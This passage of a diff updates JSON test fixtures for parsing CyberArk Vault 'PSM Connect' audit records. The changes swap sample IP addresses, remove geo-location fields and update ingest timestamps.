Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1569,21 +1383,21 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "692fe25f-f940-4170-8ea4-5241b35173f0", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 06:18:31", "desc": "PSM Connect" 
@@ -1594,8 +1408,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936295400Z", - "original": "\u003c5\u003e1 2021-03-15T13:18:31Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:31\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:31Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:31\",\"IsoTimestamp\":\"2021-03-15T13:18:31Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331199Z", + "original": "\u003c5\u003e1 2021-03-15T13:18:31Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:31\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:31Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n 
\u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 
06:18:31\",\"IsoTimestamp\":\"2021-03-15T13:18:31Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1618,39 +1432,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
@@ -1667,7 +1460,7 @@ }, "@timestamp": "2021-03-15T14:08:06.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
@@ -1678,16 +1471,15 @@ "adrian" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:08:06Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:06\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:06Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:06\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:06Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1699,21 +1491,21 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "f5725611-ca57-4a2a-a089-f45b3174a358", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 07:08:06", "desc": "PSM Connect" 
@@ -1724,8 +1516,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936298200Z", - "original": "\u003c5\u003e1 2021-03-15T14:08:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:06\",\"IsoTimestamp\":\"2021-03-15T14:08:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331203Z", + "original": "\u003c5\u003e1 2021-03-15T14:08:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n 
\u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 
07:08:06\",\"IsoTimestamp\":\"2021-03-15T14:08:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1748,39 +1540,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
@@ -1797,7 +1568,7 @@ }, "@timestamp": "2021-03-15T14:08:28.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -1808,16 +1579,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:08:28Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 